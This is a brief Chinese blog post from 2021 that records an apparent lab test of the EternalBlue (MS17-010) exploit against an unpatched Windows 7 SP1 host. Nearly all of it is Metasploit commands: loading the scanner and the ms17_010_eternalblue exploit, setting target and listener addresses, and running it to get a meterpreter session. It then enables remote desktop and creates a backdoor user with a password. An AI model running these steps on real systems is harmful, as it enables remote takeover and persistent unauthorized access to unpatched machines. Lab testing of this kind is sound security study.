Win7 SP1 64 位永恒之蓝POC测试

kali主机:10.158.1.110
windows7 pro:10.158.1.120
注:未打补丁
 
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue          //调用攻击模块
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.158.1.120
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.158.1.110
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
 
meterpreter > run post/windows/manage/enable_rdp                        //启动远程桌面
meterpreter > run post/windows/manage/enable_rdp USERNAME=kddi PASSWORD=pwd@123            //创建用户
 
受害主机查看
 

posted on 2021-04-17 09:12  CyberSecurityBook  阅读(157)  评论(0编辑  收藏  举报

导航